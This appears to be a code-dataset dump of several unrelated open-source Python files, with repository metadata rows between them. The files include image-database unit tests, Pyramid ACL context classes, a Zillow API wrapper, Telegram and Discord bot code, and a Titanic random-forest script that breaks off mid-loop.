        # _parse_line returns (path, label) and counts labels in c.
        c = Counter()
        p, l = create_db._parse_line(line, c)
        assert l == label, 'parsed label wrong'
        assert c[l] == 1, 'distribution is wrong'
    def test_bad_lines(self):
        # Missing, non-numeric and negative labels must all be rejected.
        for line in [
            'nolabel.jpg',
            'non-number.jpg five',
            'negative.jpg -1',
        ]:
            yield self.check_bad_line, line
    def check_bad_line(self, line):
        nose.tools.assert_raises(
            create_db.ParseLineError,
            create_db._parse_line,
            line, Counter()
        )
class TestCalculateBatchSize():
    """Tests for create_db._calculate_batch_size (capped at 100 per cases below)."""
    def test(self):
        for count, batch_size in [
            (1, 1),
            (50, 50),
            (100, 100),
            (200, 100),
        ]:
            yield self.check, count, batch_size
    def check(self, count, batch_size):
        assert create_db._calculate_batch_size(count) == batch_size
class TestCalculateNumThreads():
    """Tests for create_db._calculate_num_threads.

    Expected: 1 thread when not shuffling; otherwise scales with batch
    size up to 10 (see the (batch_size, shuffle, num) cases below).
    """
    def test(self):
        for batch_size, shuffle, num in [
            (1000, True, 10),
            (1000, False, 1),
            (100, True, 10),
            (100, False, 1),
            (50, True, 7),
            (4, True, 2),
            (1, True, 1),
        ]:
            yield self.check, batch_size, shuffle, num
    def check(self, batch_size, shuffle, num):
        assert create_db._calculate_num_threads(
            batch_size, shuffle) == num
class TestInitialImageSum():
    """Tests for create_db._initial_image_sum: float64 accumulator shape."""
    def test_color(self):
        s = create_db._initial_image_sum(10, 10, 3)
        assert s.shape == (10, 10, 3)
        assert s.dtype == 'float64'
    def test_grayscale(self):
        # Single-channel sums are 2-D, not (H, W, 1).
        s = create_db._initial_image_sum(10, 10, 1)
        assert s.shape == (10, 10)
        assert s.dtype == 'float64'
class TestImageToDatum(BaseTest):
    """Tests for create_db._array_to_datum: dims and encoding flag."""
    def test(self):
        # compression None means raw pixels; 'png'/'jpg' set encoded=True.
        for compression in None, 'png', 'jpg':
            yield self.check_color, compression
            yield self.check_grayscale, compression
    def check_color(self, compression):
        d = create_db._array_to_datum(self.numpy_image_color, 1, compression)
        assert d.height == self.numpy_image_color.shape[0]
        assert d.width == self.numpy_image_color.shape[1]
        assert d.channels == 3
        assert d.encoded == bool(compression)
    def check_grayscale(self, compression):
        d = create_db._array_to_datum(self.numpy_image_gray, 1, compression)
        assert d.height == self.numpy_image_gray.shape[0]
        assert d.width == self.numpy_image_gray.shape[1]
        assert d.channels == 1
        assert d.encoded == bool(compression)
class TestSaveMeans():
    """Tests for create_db._save_means across all supported output formats."""
    def test(self):
        for color in True, False:
            d = tempfile.mkdtemp()
            for filename in 'mean.jpg', 'mean.png', 'mean.npy', 'mean.binaryproto':
                yield self.check, d, filename, color
            shutil.rmtree(d)
    def check(self, directory, filename, color):
        filename = os.path.join(directory, filename)
        if color:
            s = np.ones((8, 10, 3), dtype='float64')
        else:
            s = np.ones((8, 10), dtype='float64')
        # Second argument is the image count the sum is divided by.
        create_db._save_means(s, 2, [filename])
        assert os.path.exists(filename)
class BaseCreationTest(BaseTest):
    """End-to-end create_db tests; subclasses set BACKEND ('lmdb'/'hdf5').

    These are smoke tests: success means create_db ran without raising.
    """
    def test_image_sizes(self):
        for width in 8, 12:
            for channels in 1, 3:
                yield self.check_image_sizes, width, channels, False
    def check_image_sizes(self, width, channels, shuffle):
        create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
                            width, 10, channels, self.BACKEND)
    def test_no_shuffle(self):
        create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
                            10, 10, 1, self.BACKEND, shuffle=False)
    def test_means(self):
        # Request every supported mean-file format in one run.
        mean_files = []
        for suffix in 'jpg', 'npy', 'png', 'binaryproto':
            mean_files.append(os.path.join(self.empty_dir, 'mean.%s' % suffix))
        create_db.create_db(self.good_file[1], os.path.join(self.empty_dir, 'db'),
                            10, 10, 1, self.BACKEND, mean_files=mean_files)
class TestLmdbCreation(BaseCreationTest):
    # Run the shared creation tests against the LMDB backend.
    BACKEND = 'lmdb'
class TestHdf5Creation(BaseCreationTest):
    # Run the shared creation tests against the HDF5 backend.
    BACKEND = 'hdf5'
    def test_dset_limit(self):
        """Splitting into multiple datasets must still list every image."""
        db_dir = os.path.join(self.empty_dir, 'db')
        create_db.create_db(self.good_file[1], db_dir,
                            10, 10, 1, 'hdf5', hdf5_dset_limit=10 * 10)
        with open(os.path.join(db_dir, 'list.txt')) as infile:
            lines = infile.readlines()
        assert len(lines) == self.image_count, '%d != %d' % (len(lines), self.image_count)
| 31.048193 | 94 | 0.585823 |
ace73f8d80e2563c56832ce5bc80706d1a256a30 | 7,159 | py | Python | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | h/traversal/contexts.py | y3g0r/h | a057144956fe25e669aeba5d0f0eb38f9dc09566 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"Context resource" objects for Pyramid views.
Context objects are reusable components that represent "the context of a view"
or "the subject of a view".
They can do things like wrap a model object (or multiple model objects) and,
since they have access to the ``request`` object, provide access to properties
that you need the request to compute such as permissions, or route URLs for a
wrapped model object. The view, or any code that the view calls and passes the
context object into, can then make use of these properties.
These context objects are returned by the root resources in
:py:mod:`h.traversal.roots` if the route is configured to use one of those root
factories (see the :py:mod:`h.traversal.roots` for usage).
For such a route Pyramid will conveniently pass the found context object into
the view callable as the ``context`` argument.
"""
from pyramid.security import DENY_ALL
from pyramid.security import Allow
from pyramid.security import principals_allowed_by_permission
from h.auth import role
from h.models.organization import ORGANIZATION_DEFAULT_PUBID
class AnnotationContext:
    """Context for annotation-based views.

    Wraps an annotation model plus the group and links services so views
    can resolve the containing group, outgoing links and the Pyramid ACL.
    """
    def __init__(self, annotation, group_service, links_service):
        self.group_service = group_service
        self.links_service = links_service
        self.annotation = annotation
    @property
    def group(self):
        """The group this annotation belongs to (looked up by groupid)."""
        return self.group_service.find(self.annotation.groupid)
    @property
    def links(self):
        """All links for this annotation, from the links service."""
        return self.links_service.get_all(self.annotation)
    def link(self, name):
        """A single named link for this annotation."""
        return self.links_service.get(self.annotation, name)
    def __acl__(self):
        """Return a Pyramid ACL for this annotation."""
        # If the annotation has been deleted, nobody has any privileges on it
        # any more.
        if self.annotation.deleted:
            return [DENY_ALL]
        acl = []
        # For shared annotations, some permissions are derived from the
        # permissions for this annotation's containing group.
        # Otherwise they are derived from the annotation's creator
        if self.annotation.shared:
            for principal in self._group_principals(self.group, "read"):
                acl.append((Allow, principal, "read"))
            for principal in self._group_principals(self.group, "flag"):
                acl.append((Allow, principal, "flag"))
            for principal in self._group_principals(self.group, "moderate"):
                acl.append((Allow, principal, "moderate"))
        else:
            acl.append((Allow, self.annotation.userid, "read"))
            # Flagging one's own private annotations is nonsensical,
            # but from an authz perspective, allowed. It is up to services/views
            # to handle these situations appropriately
            acl.append((Allow, self.annotation.userid, "flag"))
        # The user who created the annotation always has the following permissions
        for action in ["admin", "update", "delete"]:
            acl.append((Allow, self.annotation.userid, action))
        # If we haven't explicitly authorized it, it's not allowed.
        acl.append(DENY_ALL)
        return acl
    @staticmethod
    def _group_principals(group, principal):
        """Principals allowed *principal* on *group*; [] when group is gone."""
        if group is None:
            return []
        principals = principals_allowed_by_permission(group, principal)
        return principals
class OrganizationContext:
    """Context for organization-based views."""
    def __init__(self, organization, request):
        # TODO Links service
        self.organization = organization
        self.request = request
    @property
    def id(self):
        return self.organization.pubid # Web-facing unique ID for this resource
    @property
    def default(self):
        """True when this is the built-in default organization."""
        return self.id == ORGANIZATION_DEFAULT_PUBID
    @property
    def links(self):
        # TODO
        return {}
    @property
    def logo(self):
        """Route URL for the organization's logo, or None if it has none."""
        if self.organization.logo:
            return self.request.route_url(
                "organization_logo", pubid=self.organization.pubid
            )
        return None
class GroupContext:
    """Context for group-based views.

    Exposes a group's web-facing id, its service-generated links and an
    OrganizationContext for its organization (if any).
    """

    def __init__(self, group, request):
        self.request = request
        self.group = group
        # Resolve the link-builder service once, up front.
        self.links_service = request.find_service(name="group_links")

    @property
    def id(self):
        """Web-facing unique ID for this resource."""
        return self.group.pubid

    @property
    def links(self):
        """All links for this group from the links service."""
        return self.links_service.get_all(self.group)

    @property
    def organization(self):
        """OrganizationContext for the group's organization, or None."""
        org = self.group.organization
        return None if org is None else OrganizationContext(org, self.request)
class GroupUpsertContext:
    """Context for group UPSERT"""
    def __init__(self, group, request):
        # group may be None: that is the "create a new group" case for
        # the UPSERT endpoint (see __acl__ below).
        self._request = request
        self.group = group
    def __acl__(self):
        """
        Get the ACL from the group model or set "upsert" for all users in absence of model

        If there is a group model, get the ACL from there. Otherwise, return an
        ACL that sets the "upsert" permission for authenticated requests that have
        a real user associated with them via :attr:`h.auth.role.User`.

        The "upsert" permission is an unusual hybrid. It has a different meaning
        depending on the upsert situation.

        If there is no group associated with the context, the "upsert" permission
        should be given to all real users such that they may use the UPSERT endpoint
        to create a new group. However, if there is a group associated with the
        context, the "upsert" permission is managed by the model. The model only
        applies "upsert" for the group's creator. This will allow the endpoint to
        support updating a specific group (model), but only if the request's
        user should be able to update the group.
        """
        # TODO: This and ``GroupContext`` can likely be merged once ``GroupContext``
        # is used more resource-appropriately and returned by :class:`h.traversal.roots.GroupRoot`
        # during traversal
        if self.group is not None:
            return self.group.__acl__()
        return [(Allow, role.User, "upsert")]
class UserContext:
    """
    Context for user-centered views

    .. todo:: Most views still traverse using ``username`` and work directly
       with User models (:class:`h.models.User`). This context should be
       expanded as we continue to move over to a more resource-based approach.
    """

    def __init__(self, user):
        self.user = user

    def __acl__(self):
        """
        Set the "read" permission for AuthClients that have a matching authority
        to the user. This supercedes the ACL in :class:`h.models.User`.

        .. todo:: This ACL should be expanded (as needed) as more views make use of
           a context versus a model directly.
        """
        principal = f"client_authority:{self.user.authority}"
        return [(Allow, principal, "read")]
| 34.253589 | 98 | 0.666853 |
ace73f941bd0e1cd18742b6d9572258a8bd4840b | 878 | py | Python | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 47 | 2020-09-26T01:30:44.000Z | 2021-12-14T13:44:49.000Z | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 32 | 2019-10-16T14:46:24.000Z | 2020-08-24T05:24:30.000Z | Language/Python/counting-characters.py | Romilj012/Hacktoberfest2020-3 | 63fb3e3c54d0b2de910009906b044f5bce7db19e | [
"MIT"
] | 302 | 2020-09-25T20:07:33.000Z | 2021-11-01T07:38:04.000Z | # This is a simple Python program that counts the number of characters within the provided string
def how_many_times_in(string):
    """Return a dict mapping each character of *string* to its occurrence count.

    Example: how_many_times_in("aba") -> {'a': 2, 'b': 1}.
    An empty string yields an empty dict.
    """
    char_results = dict()
    for char in string:
        # dict.get with a default replaces the original if/else membership
        # test -- one lookup instead of two, same resulting dict.
        char_results[char] = char_results.get(char, 0) + 1
    return char_results
def main():
    """Count the characters of a fixed Lorem-Ipsum sample and print a sorted report."""
    counts = how_many_times_in("Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc accumsan sem ut ligula scelerisque sollicitudin. Ut at sagittis augue. Praesent quis rhoncus justo. Aliquam erat volutpat. Donec sit amet suscipit metus, non lobortis massa. Vestibulum augue ex, dapibus ac suscipit vel, volutpat eget massa. Donec nec velit non ligula efficitur luctus.")
    # One "char: count" line per distinct character, in sorted order.
    for ch in sorted(counts):
        print(f"{ch}: {counts[ch]}")


if __name__ == "__main__":
    main()
| 35.12 | 387 | 0.716401 |
ace740bb11065942646dda8555fb704ac5564539 | 89 | py | Python | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 9 | 2019-05-05T20:59:25.000Z | 2021-07-30T16:49:04.000Z | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 1 | 2019-05-17T13:33:36.000Z | 2019-05-17T13:33:36.000Z | {{cookiecutter.project_name}}/tests/__init__.py | wboxx1/cookiecutter-pypackage | 9e6ce697e3f56c15584c21d8144e99cb5f151dab | [
"BSD-3-Clause"
] | 7 | 2019-03-09T14:51:08.000Z | 2021-07-26T10:03:40.000Z | # -*- coding: utf-8 -*-
"""Unit test package for {{ cookiecutter.project_slug }}."""
| 22.25 | 61 | 0.58427 |
ace742000d6523291bd254ef2517fbae422987bb | 2,079 | py | Python | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | 1 | 2017-05-02T10:34:26.000Z | 2017-05-02T10:34:26.000Z | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | null | null | null | zillow.py | gregimba/zillow-python | 59557f7e2ade73b498c1e0cf7e4a2751b80c5f88 | [
"BSD-2-Clause"
] | null | null | null | import requests
import xmltodict
import os
class Zillow(object):
    """A python wrapper for the Zillow Home API.

    Reads the Zillow Web Service ID from the ``ZWSID`` environment
    variable.  Every endpoint method returns the parsed XML response as a
    dict on HTTP 200, otherwise the numeric HTTP status code.
    """
    def __init__(self):
        # A KeyError here means ZWSID is not configured -- fail fast.
        self.ZWSID = os.environ['ZWSID']
        self.base = "https://www.zillow.com/webservice/"

    def _get(self, endpoint, data):
        """GET *endpoint* with query params *data*; parse XML on success."""
        response = requests.get(self.base + endpoint, params=data)
        if response.status_code == 200:
            return xmltodict.parse(response.text)
        else:
            return response.status_code

    def GetSearchResults(self, address, citystatezip):
        """Look up a property by street address and city/state/ZIP."""
        data = {'zws-id': self.ZWSID, 'address': address, 'citystatezip': citystatezip}
        return self._get("GetSearchResults.htm", data)

    def GetZestimate(self, zpid):
        """Fetch the Zestimate for a Zillow property id.

        BUG FIX: the original called requests.get(base + ...) with the
        undefined global ``base`` (NameError at call time); it now goes
        through _get(), which uses self.base.
        """
        data = {'zws-id': self.ZWSID, 'zpid': zpid}
        return self._get("GetZestimate.htm", data)

    def GetChart(self, zpid, unit_type, width, height, duration):
        """Fetch chart data for the property (size and duration as given)."""
        data = {'zws-id': self.ZWSID,
                'zpid': zpid,
                'unit-type': unit_type,
                'width': width,
                'height': height,
                'chartDuration': duration}
        return self._get("GetChart.htm", data)

    def GetComps(self, zpid, count):
        """Fetch up to *count* comparable properties for *zpid*."""
        data = {'zws-id': self.ZWSID, 'zpid': zpid, 'count': count}
        return self._get("GetComps.htm", data)

    def GetDeepComps(self, zpid, count):
        """Fetch comparables with extended ("deep") property data."""
        data = {'zws-id': self.ZWSID, 'zpid': zpid, 'count': count}
        return self._get("GetDeepComps.htm", data)
| 33 | 87 | 0.596922 |
ace74288420727c76ad7ea06d94b4f37f4c90ccd | 5,798 | py | Python | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | 16 | 2019-03-15T16:25:24.000Z | 2022-01-28T14:05:01.000Z | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | null | null | null | telegram/Chat.py | TobxD/codeforces_live_bot | d59cd4ed95539ae7389f1fe4ad6cbebfb5c246ad | [
"Apache-2.0"
] | 1 | 2021-07-03T16:52:59.000Z | 2021-07-03T16:52:59.000Z | import threading
from telegram import telegram as tg
from utils import database as db
# Process-wide cache of Chat objects keyed by chat id; every access to
# the dict structure itself must hold chatsLock.
chatsLock = threading.Lock()
chats = {}
def getChat(chatId : str):
	"""Return the cached Chat for *chatId*, creating and caching it on first use."""
	with chatsLock:
		if chats.get(chatId) is None:
			chats[chatId] = Chat(chatId)
	return chats[chatId]
def initChats():
	"""Populate the chat cache with every known chat partner from the DB."""
	with chatsLock:
		for partnerId in db.getAllChatPartners():
			chats[partnerId] = Chat(partnerId)
def deleteUser(chatId):
	"""Drop *chatId* from the cache and the database (safe to call twice)."""
	with chatsLock:
		# pop-with-default makes repeated deletions harmless no-ops;
		# only delete from the DB when the cache entry actually existed.
		if chats.pop(chatId, None) is not None:
			db.deleteUser(chatId)
class Chat:
	"""Per-chat settings and messaging state, persisted to the database.

	Every settings property writes through to the DB on assignment via
	_updateDB().  Outgoing Telegram traffic is funnelled through
	tg.requestSpooler; chat id '0' is a console/debug chat that only
	prints instead of calling Telegram.

	BUG FIX: the original class defined the ``reminder1d`` property and
	setter twice with identical bodies; the duplicate has been removed.
	"""
	def __init__(self, chatId:str):
		self._chatId = chatId
		self._activeMsgGroups = set()  # msg groups with a deferred edit pending
		self._editLaterLock = threading.Lock()
		self._notifications = [] # all upsolving etc. msgs to be grouped
		self._notificationLock = threading.Lock()
		infos = db.queryChatInfos(chatId)
		if infos is None:
			# Unknown chat -> initialise with defaults and persist them.
			self._apikey = None
			self._secret = None
			self._timezone = None
			self._handle = None
			self._notifyLevel = 3 # everything except in contest notifications
			self._polite = False
			self._reply = True
			self._width = 6
			self._reminder2h = True
			self._reminder1d = True
			self._reminder3d = False
			self._settings_msgid = None
			self._updateDB()
		else:
			(self._apikey, self._secret, self._timezone, self._handle,
				self._notifyLevel,
				self._polite, self._reply, self._width,
				self._reminder2h, self._reminder1d, self._reminder3d,
				self._settings_msgid) = infos
		if self._timezone is None:
			self._timezone = "UTC"

	# --- persisted settings: each setter writes through to the DB ---

	@property
	def chatId(self):
		return self._chatId
	@chatId.setter
	def chatId(self, chatId:str):
		self._chatId = chatId
		self._updateDB()

	@property
	def apikey(self):
		return self._apikey
	@apikey.setter
	def apikey(self, key):
		self._apikey = key
		self._updateDB()

	@property
	def secret(self):
		return self._secret
	@secret.setter
	def secret(self, scr):
		self._secret = scr
		self._updateDB()

	@property
	def timezone(self):
		return self._timezone
	@timezone.setter
	def timezone(self, tz):
		self._timezone = tz
		self._updateDB()

	@property
	def handle(self):
		return self._handle
	@handle.setter
	def handle(self, h):
		self._handle = h
		self._updateDB()

	@property
	def notifyLevel(self):
		return self._notifyLevel
	@notifyLevel.setter
	def notifyLevel(self, l):
		self._notifyLevel = l
		self._updateDB()

	@property
	def polite(self):
		return self._polite
	@polite.setter
	def polite(self, l):
		self._polite = l
		self._updateDB()

	@property
	def reply(self):
		return self._reply
	@reply.setter
	def reply(self, newVal):
		self._reply = newVal
		self._updateDB()

	@property
	def width(self):
		return self._width
	@width.setter
	def width(self, newVal):
		self._width = newVal
		self._updateDB()

	@property
	def reminder2h(self):
		return self._reminder2h
	@reminder2h.setter
	def reminder2h(self, newVal):
		self._reminder2h = newVal
		self._updateDB()

	@property
	def reminder1d(self):
		return self._reminder1d
	@reminder1d.setter
	def reminder1d(self, newVal):
		self._reminder1d = newVal
		self._updateDB()

	@property
	def reminder3d(self):
		return self._reminder3d
	@reminder3d.setter
	def reminder3d(self, newVal):
		self._reminder3d = newVal
		self._updateDB()

	@property
	def settings_msgid(self):
		return self._settings_msgid
	@settings_msgid.setter
	def settings_msgid(self, newVal):
		self._settings_msgid = newVal
		self._updateDB()

	def _updateDB(self):
		"""Persist all settings of this chat to the database."""
		db.updateChatInfos(self.chatId, self.apikey, self.secret, self.timezone,
			self.handle, self.notifyLevel,
			self.polite, self.reply, self.width, self.reminder2h,
			self.reminder1d, self.reminder3d, self.settings_msgid)

	def sendMessage(self, text, reply_markup = None, callback=None):
		"""Queue a Telegram message; chat '0' just prints to stdout."""
		if self.chatId == '0':
			print('\n----- message sent: ------------\n' + text + "\n--------- End Message ----------\n")
			return 0
		else:
			tg.requestSpooler.put(lambda : tg.sendMessage(self.chatId, text, reply_markup, callback), priority=0)

	# message which can be grouped
	def sendNotification(self, text):
		"""Queue *text*; notifications queued before dispatch are sent as one message."""
		if self.chatId == '0':
			print('\n----- message sent: ------------\n' + text + "\n--------- End Message ----------\n")
			return
		def sendGroupedNotifications():
			with self._notificationLock:
				msgText = "\n".join(self._notifications)
				self._notifications = []
			tg.sendMessage(self._chatId, msgText)
		with self._notificationLock:
			self._notifications.append(text)
			if len(self._notifications) == 1: # add to spooler queue
				tg.requestSpooler.put(sendGroupedNotifications, priority=1)

	def editMessageText(self, msgId, msg, reply_markup = None):
		"""Queue an edit of an existing message's text."""
		if self.chatId == '0':
			print('\n----- message edited to: ---------\n' + msg + "\n--------- End Message ----------\n")
		else:
			tg.requestSpooler.put(lambda : tg.editMessageText(self.chatId, msgId, msg, reply_markup), priority=0)

	def editMessageTextLater(self, msgId, msgGroup, fun):
		"""Schedule a deferred edit of *msgId*; at most one pending edit per *msgGroup*.

		*fun* is called later with (chat, msgGroup) and must return the new
		message text, or a falsy value to skip the edit.
		"""
		if self.chatId == '0':
			msg = fun(self, msgGroup)
			if msg:
				print('\n----- message sent: ------------\n' + msg + "\n--------- End Message ----------\n")
			return
		with self._editLaterLock:
			if msgGroup not in self._activeMsgGroups:
				self._activeMsgGroups.add(msgGroup)
			else:
				return
		def editMsgNow():
			msg = fun(self, msgGroup)
			if msg:
				tg.editMessageText(self.chatId, msgId, msg)
			with self._editLaterLock:
				self._activeMsgGroups.remove(msgGroup)
		tg.requestSpooler.put(editMsgNow, priority=2)

	def deleteMessage(self, msgId):
		"""Queue deletion of a message."""
		if self.chatId == '0':
			print('\n----- message deleted:' + msgId + '---------\n')
		else:
			tg.requestSpooler.put(lambda : tg.deleteMessage(self.chatId, msgId), priority=1)
| 23.762295 | 104 | 0.692308 |
ace74328c77e125b61791e5ad9237cd17ae5aa83 | 3,861 | py | Python | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 6 | 2018-06-23T10:22:07.000Z | 2021-07-12T15:09:28.000Z | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-29T22:25:45.000Z | 2020-11-01T00:12:55.000Z | main.py | DerpDays/Suggestion-Bot | 9eaa5897a5b8171cc54342d2a7cfade89ccdb2c6 | [
"MIT",
"Unlicense"
] | 6 | 2019-02-18T17:15:04.000Z | 2021-07-17T11:48:39.000Z | import discord
from discord.ext import commands
from discord import utils
import asyncio
import time
import json
# Cogs to load from the extensions/ package at startup (see __main__ below).
extensions = ["settings", "developer", "suggest", "general"]
def get_prefix(bot, message):
    """Return the command-prefix callable result for this message.

    In DMs only the global prefix applies; in a guild the per-guild prefix
    is accepted alongside the global one.  Mentioning the bot always works
    (commands.when_mentioned_or).
    """
    gprefix = client.config["GLOBAL"]["PREFIX"]
    if message.guild is None:
        # BUG FIX: the original did ``extras = gprefix`` (a string) and then
        # splatted it into when_mentioned_or(*extras), which turns a
        # multi-character prefix into one prefix per character.  Pass the
        # prefix as a single argument instead.
        return commands.when_mentioned_or(gprefix)(bot, message)
    prefix = client.config["GUILDS"][str(message.guild.id)]["PREFIX"]
    return commands.when_mentioned_or(prefix, gprefix)(bot, message)
client = commands.Bot(command_prefix=get_prefix)
# All global and per-guild settings live in settings.json; load once at
# startup and keep the dict on the bot so commands can read/write it.
with open('settings.json', 'r') as f:
    client.config = json.load(f)
async def add_guild():
    """Create default config entries for any guilds missing from settings.json."""
    if not "GUILDS" in client.config:
        client.config["GUILDS"] = {}
    for guild in client.guilds:
        gid = str(guild.id)
        if gid not in client.config["GUILDS"]:
            # Defaults for a freshly added server.
            client.config["GUILDS"][gid] = {
                "TOGGLED": "ON",
                "TOGGLEPM": "OFF",
                "OUTPUT": None,
                "ID": "1",
                "PREFIX": "!"
            }
            print(f"Added new server to the config file ({guild.name})")
    # Persist the (possibly updated) config back to disk.
    with open('settings.json', 'w') as f:
        json.dump(client.config, f, indent=2)
@client.event
async def on_guild_join(guild):
    """Register a newly joined guild and DM its owner a welcome/setup embed."""
    await add_guild()
    embed = discord.Embed(title=f':tools: Suggestion Bot', color=0xffffff)
    embed.add_field(name=f'Thanks for adding suggestion bot {guild.owner.name}!', value=f'To configure the bot use **!settings** in a server text channel. To see the available commands do: **!help**, \nplease make sure the bot has the following permission: `Administrator` or the following: `Manage messages`, `Add reactions`, `Read messages`, `Send messages`, `Read message history`, `Embed links` and `Attach file`')
    embed.add_field(name=f'Links', value=f'[Source Code](https://github.com/DerpDays/Suggestion-Bot) | [Support Server](http://discord.gg/8nG3FkS) | [Suppoort Me](http://paypal.me/DerpDays)')
    await guild.owner.send(embed=embed)
@client.event
async def on_ready():
    """Print the startup banner, set the bot presence and sync guild configs."""
    print('-------------------------------------------------------------')
    print('Bot created by @DerpDays#0001')
    print('You may not remove the credit,')
    print('However you can expand the bot.')
    print('If you have any issues please contact me on discord')
    print('Or create a issue on GitHub')
    print('-------------------------------------------------------------')
    # type=0 is the "Playing" activity.
    await client.change_presence(activity=discord.Activity(name='Suggestion Bot | !help', type=0))
    await add_guild()
if __name__ == '__main__':
    # Load every cog; one failing extension must not stop the others.
    for extension in extensions:
        try:
            client.load_extension("extensions." + extension)
        except Exception as e:
            print("")
            print("TRACEBACK")
            print("--------------------------------")
            print(e)
            print("--------------------------------")
            print('Failed to load extension {}'.format(extension))
            print("")
    try:
        client.run(client.config["GLOBAL"]["TOKEN"], bot=True, reconnect=True)
    # BUG FIX: was a bare ``except:`` which also swallowed KeyboardInterrupt
    # and SystemExit; Exception still covers login failures.
    except Exception:
        print("---------------------------------------------------------------------")
        # Repeat the warning for visibility (the original printed it six times).
        for _ in range(6):
            print("INVALID TOKEN, PLEASE EDIT THE TOKEN FIELD IN SETTINGS.JSON")
        print("---------------------------------------------------------------------")
        time.sleep(10)
ace74384f21d3b9c6bd12457f62336e5b41329f6 | 3,241 | py | Python | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | random_forest.py | AbnerZheng/Titanic_Kaggle | 5e765a91c81b3a2742d18f85a4d857975f746d75 | [
"MIT"
] | null | null | null | print('Importing libraries...')
import numpy as np
import pandas as pd
from sklearn import cross_validation as cv
from sklearn.cross_validation import KFold
from sklearn.ensemble import RandomForestClassifier
print('Fetching the training and test datasets...')
# Kaggle Titanic CSVs; force Age to float64 so blanks become NaN.
train = pd.read_csv("./input/train.csv", dtype={"Age": np.float64}, )
test = pd.read_csv("./input/test.csv", dtype={"Age": np.float64}, )
print('Cleaning the dataset...')
def harmonize_data(titanic):
    """Fill missing values and encode categoricals numerically, in place.

    Age/Fare NaNs become the column mean, missing Embarked becomes "S",
    then Sex (male=1, female=0) and Embarked (S=0, C=1, Q=2) are encoded.
    Returns the (mutated) frame for convenience.
    """
    # Filling the blank data
    for column in ("Age", "Fare"):
        titanic[column] = titanic[column].fillna(titanic[column].mean())
    titanic["Embarked"] = titanic["Embarked"].fillna("S")
    # Assigning binary form to data for calculation purpose
    for value, code in (("male", 1), ("female", 0)):
        titanic.loc[titanic["Sex"] == value, "Sex"] = code
    for port, code in (("S", 0), ("C", 1), ("Q", 2)):
        titanic.loc[titanic["Embarked"] == port, "Embarked"] = code
    return titanic
print('Defining submission file...')
def create_submission(rfc, train, test, predictors, filename):
    """Fit *rfc* on the training frame and write a Kaggle submission CSV.

    The CSV has PassengerId and Survived columns and no index column.
    """
    rfc.fit(train[predictors], train["Survived"])
    predicted = rfc.predict(test[predictors])
    frame = pd.DataFrame({
        "PassengerId": test["PassengerId"],
        "Survived": predicted
    })
    frame.to_csv(filename, index=False)
print('Defining the clean dataset...')
train_data = harmonize_data(train)
test_data = harmonize_data(test)
print('Performing feature enginnering...')
# PSA: product of class, encoded sex and age; SP: family size (siblings/
# spouses + parents/children).
train_data["PSA"] = train_data["Pclass"]*train_data["Sex"]*train_data["Age"]
train_data["SP"] = train_data["SibSp"]+train_data["Parch"]
test_data["PSA"] = test_data["Pclass"]*test_data["Sex"]*test_data["Age"]
test_data["SP"] = test_data["SibSp"]+test_data["Parch"]
print('Defining predictors...')
# Feature columns fed to the classifier below.
predictors = ["Pclass", "Sex", "Age", "PSA", "Fare", "Embarked", "SP"]
print('Finding best n_estimators for RandomForestClassifier...')
# Grid-search n_estimators by mean 10-fold CV accuracy.
max_score = 0
best_n = 0
for n in range(1,300):
    rfc_scr = 0.
    rfc = RandomForestClassifier(n_estimators=n)
    # BUG FIX: the loop variables were named ``train, test``, shadowing the
    # train/test DataFrames loaded above; renamed to index variables.
    for train_idx, test_idx in KFold(len(train_data), n_folds=10, shuffle=True):
        rfc.fit(train_data[predictors].T[train_idx].T, train_data["Survived"].T[train_idx].T)
        rfc_scr += rfc.score(train_data[predictors].T[test_idx].T, train_data["Survived"].T[test_idx].T)/10
    if rfc_scr > max_score:
        max_score = rfc_scr
        best_n = n
print(best_n, max_score)
print('Finding best max_depth for RandomForestClassifier...')
# Grid-search max_depth by mean 10-fold CV accuracy.
max_score = 0
best_m = 0
for m in range(1,100):
    rfc_scr = 0.
    rfc = RandomForestClassifier(max_depth=m)
    # BUG FIX: loop variables renamed from ``train, test`` to avoid
    # shadowing the train/test DataFrames loaded above.
    for train_idx, test_idx in KFold(len(train_data), n_folds=10, shuffle=True):
        rfc.fit(train_data[predictors].T[train_idx].T, train_data["Survived"].T[train_idx].T)
        rfc_scr += rfc.score(train_data[predictors].T[test_idx].T, train_data["Survived"].T[test_idx].T)/10
